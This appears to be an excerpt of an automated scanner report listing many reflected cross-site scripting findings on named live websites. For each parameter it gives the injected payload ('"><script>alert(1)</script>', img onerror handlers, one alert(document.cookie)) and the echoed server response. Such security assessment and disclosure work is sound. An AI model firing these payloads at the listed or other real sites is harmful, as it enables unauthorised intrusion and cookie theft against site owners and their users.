<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="50" maxlength="60" name="SourceDesc" value="ad0ec"><script>alert(1)</script>40e439a7c6095ec33" ID="Text10"> ...[SNIP]...
The value of the StateText request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0ed"><script>alert(1)</script>cb2b62692953b2e7a was submitted in the StateText parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:10:12 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28212
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="20" maxlength="20" name="StateText" value="7d0ed"><script>alert(1)</script>cb2b62692953b2e7a" ID="Text9"> ...[SNIP]...
The value of the UserName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26a60"><script>alert(1)</script>a47f54a6dcb361cb2 was submitted in the UserName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:09:00 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="25" maxlength="15" name="UserName" value="26a60"><script>alert(1)</script>a47f54a6dcb361cb2"> ...[SNIP]...
The value of the Website request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cbeb"><script>alert(1)</script>7d95377e38fb8dfe9 was submitted in the Website parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:09:12 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28423
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="30" maxlength="80" name="Website" value="9cbeb"><script>alert(1)</script>7d95377e38fb8dfe9" ID="Text7"> ...[SNIP]...
The value of the Zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecea8"><script>alert(1)</script>4622cbfd507228337 was submitted in the Zip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:10:23 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28236
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="10" maxlength="10" name="Zip" value="ecea8"><script>alert(1)</script>4622cbfd507228337"> ...[SNIP]...
The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0a8d"><script>alert(1)</script>379f3fe056866076e was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:06:38 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="hidden" name="key" value="e0a8d"><script>alert(1)</script>379f3fe056866076e"> ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9541'%3balert(1)//ee30cd37f24 was submitted in the t parameter. This input was echoed as e9541';alert(1)//ee30cd37f24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the buyForm3021_optionValue100 request parameter is copied into the HTML document as plain text between tags. The payload f5b6b<img%20src%3da%20onerror%3dalert(1)>5a0874cdcf was submitted in the buyForm3021_optionValue100 parameter. This input was echoed as f5b6b<img src=a onerror=alert(1)>5a0874cdcf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue101 request parameter is copied into the HTML document as plain text between tags. The payload a3ac9<img%20src%3da%20onerror%3dalert(1)>ca9319cd559 was submitted in the buyForm3021_optionValue101 parameter. This input was echoed as a3ac9<img src=a onerror=alert(1)>ca9319cd559 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue102 request parameter is copied into the HTML document as plain text between tags. The payload 5b2b4<img%20src%3da%20onerror%3dalert(1)>2dae0cf4193 was submitted in the buyForm3021_optionValue102 parameter. This input was echoed as 5b2b4<img src=a onerror=alert(1)>2dae0cf4193 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue103 request parameter is copied into the HTML document as plain text between tags. The payload 1d394<img%20src%3da%20onerror%3dalert(1)>839fc1af98d was submitted in the buyForm3021_optionValue103 parameter. This input was echoed as 1d394<img src=a onerror=alert(1)>839fc1af98d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue104 request parameter is copied into the HTML document as plain text between tags. The payload e956a<img%20src%3da%20onerror%3dalert(1)>961ffc32d71 was submitted in the buyForm3021_optionValue104 parameter. This input was echoed as e956a<img src=a onerror=alert(1)>961ffc32d71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue234 request parameter is copied into the HTML document as plain text between tags. The payload 20625<img%20src%3da%20onerror%3dalert(1)>ec7ca72f201 was submitted in the buyForm3021_optionValue234 parameter. This input was echoed as 20625<img src=a onerror=alert(1)>ec7ca72f201 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue89 request parameter is copied into the HTML document as plain text between tags. The payload b535d<img%20src%3da%20onerror%3dalert(1)>da236fdb197 was submitted in the buyForm3021_optionValue89 parameter. This input was echoed as b535d<img src=a onerror=alert(1)>da236fdb197 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue90 request parameter is copied into the HTML document as plain text between tags. The payload c4005<img%20src%3da%20onerror%3dalert(1)>d2da79f8cd3 was submitted in the buyForm3021_optionValue90 parameter. This input was echoed as c4005<img src=a onerror=alert(1)>d2da79f8cd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue91 request parameter is copied into the HTML document as plain text between tags. The payload 25a69<img%20src%3da%20onerror%3dalert(1)>60e211932b3 was submitted in the buyForm3021_optionValue91 parameter. This input was echoed as 25a69<img src=a onerror=alert(1)>60e211932b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue92 request parameter is copied into the HTML document as plain text between tags. The payload a35d0<img%20src%3da%20onerror%3dalert(1)>63093daffc2 was submitted in the buyForm3021_optionValue92 parameter. This input was echoed as a35d0<img src=a onerror=alert(1)>63093daffc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue93 request parameter is copied into the HTML document as plain text between tags. The payload 3ca31<img%20src%3da%20onerror%3dalert(1)>c3f9fe35a94 was submitted in the buyForm3021_optionValue93 parameter. This input was echoed as 3ca31<img src=a onerror=alert(1)>c3f9fe35a94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue94 request parameter is copied into the HTML document as plain text between tags. The payload bd121<img%20src%3da%20onerror%3dalert(1)>dd999491e54 was submitted in the buyForm3021_optionValue94 parameter. This input was echoed as bd121<img src=a onerror=alert(1)>dd999491e54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue95 request parameter is copied into the HTML document as plain text between tags. The payload 8e184<img%20src%3da%20onerror%3dalert(1)>d5082daa7fd was submitted in the buyForm3021_optionValue95 parameter. This input was echoed as 8e184<img src=a onerror=alert(1)>d5082daa7fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue96 request parameter is copied into the HTML document as plain text between tags. The payload 40ff1<img%20src%3da%20onerror%3dalert(1)>6c082eb0082 was submitted in the buyForm3021_optionValue96 parameter. This input was echoed as 40ff1<img src=a onerror=alert(1)>6c082eb0082 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue97 request parameter is copied into the HTML document as plain text between tags. The payload 2fbf5<img%20src%3da%20onerror%3dalert(1)>38934e0c95b was submitted in the buyForm3021_optionValue97 parameter. This input was echoed as 2fbf5<img src=a onerror=alert(1)>38934e0c95b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue98 request parameter is copied into the HTML document as plain text between tags. The payload 61958<img%20src%3da%20onerror%3dalert(1)>7a7fc952497 was submitted in the buyForm3021_optionValue98 parameter. This input was echoed as 61958<img src=a onerror=alert(1)>7a7fc952497 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the buyForm3021_optionValue99 request parameter is copied into the HTML document as plain text between tags. The payload 3a9b7<img%20src%3da%20onerror%3dalert(1)>d450c3292d7 was submitted in the buyForm3021_optionValue99 parameter. This input was echoed as 3a9b7<img src=a onerror=alert(1)>d450c3292d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 598c4<img%20src%3da%20onerror%3dalert(1)>01f6b76535b6cd0b was submitted in the id parameter. This input was echoed as 598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 500 Element buyForm3021598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b_productId is undefined in a Java object of type class coldfusion.filter.FormScope. Content-Type: text/html Server: Microsoft-IIS/7.5 server-error: true Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:24:33 GMT;path=/ X-Powered-By: ASP.NET Date: Sun, 15 May 2011 14:24:32 GMT Content-Length: 12421
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> Element buyForm3021598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b_productId is undefined in a Java object of type class coldfusion.filter.FormScope. </h1> ...[SNIP]...
The value of the 8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c271"><script>alert(1)</script>733e64ec1b7 was submitted in the 8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr ...[SNIP]... rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=14c271"><script>alert(1)</script>733e64ec1b7')+'&langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))"> ...[SNIP]...
3.102. http://www.oscommerce-manager.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oscommerce-manager.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b64d"><script>alert(1)</script>d053e3a864d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8b64d"><script>alert(1)</script>d053e3a864d=1 HTTP/1.1 Host: www.oscommerce-manager.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19855"><script>alert(1)</script>f81842b4bda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ab2"><script>alert(1)</script>c8a9382be42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec796"><script>alert(1)</script>4cd7466cee6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c1a2"><script>alert(1)</script>0adfa5fb7d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baba7"><script>alert(1)</script>59e7569ef6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b6a"><script>alert(1)</script>5e71549a0f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3277"><script>alert(1)</script>b21edc70c0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed16"><script>alert(1)</script>f7f860cf0a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57413"><script>alert(1)</script>61f1851e1b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68db8"><script>alert(1)</script>45158dab790 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995f5"><script>alert(1)</script>a0c6474d956 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ebfc"><script>alert(1)</script>470968f84d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d98c"><script>alert(1)</script>b4b89e17f6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8db62"><script>alert(1)</script>404afc2e942 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98755"><script>alert(1)</script>756dc892b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4d1e"><script>alert(1)</script>568ef29fa29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8b60"><script>alert(1)</script>c46cf9ef0fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78a30"><script>alert(1)</script>484cc22110d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19527"><script>alert(1)</script>66a5488c9ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17f01"><script>alert(1)</script>dcd70175ca0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb10a"><script>alert(1)</script>71a3c70d3e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 761d0"><script>alert(1)</script>1b47fb348be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77c9e"><script>alert(1)</script>f530f647a18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5d83"><script>alert(1)</script>a9586df36a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6363"><script>alert(1)</script>1aac51cff8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ce5"><script>alert(1)</script>83eb18f0444 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90cd"><script>alert(1)</script>3c6d67d4f10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b61e"><script>alert(1)</script>9ae9ad7a90d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c7e"><script>alert(1)</script>c193572c9b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e838b"><script>alert(1)</script>c7a2b0b1109 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810c9"><script>alert(1)</script>4c29409ea48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ffe"><script>alert(1)</script>cc6210ba8e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca473"><script>alert(1)</script>135982207b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d27"><script>alert(1)</script>90d976281d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d97c4"><script>alert(1)</script>d3f5fc0f678 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6930"><script>alert(1)</script>e13ba40e060 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d41"><script>alert(1)</script>0b40349dd1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90fb"><script>alert(1)</script>1ea0e7a080 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10c53"><script>alert(1)</script>92c043d2bd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82d9d"><script>alert(1)</script>3ff12a53a87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3fba"><script>alert(1)</script>c22da2ed4f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d7f"><script>alert(1)</script>18ea0726c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105cb"><script>alert(1)</script>5dd21cebd5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f76f"><script>alert(1)</script>fb7b171dc58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a461"><script>alert(1)</script>646e21d0eab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e42"><script>alert(1)</script>6c47226d429 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.149. http://www.oscommerce-manager.com/order [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oscommerce-manager.com
Path:
/order
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bc1b"><script>alert(1)</script>4491b6523c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3691d"><script>alert(1)</script>633d138c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
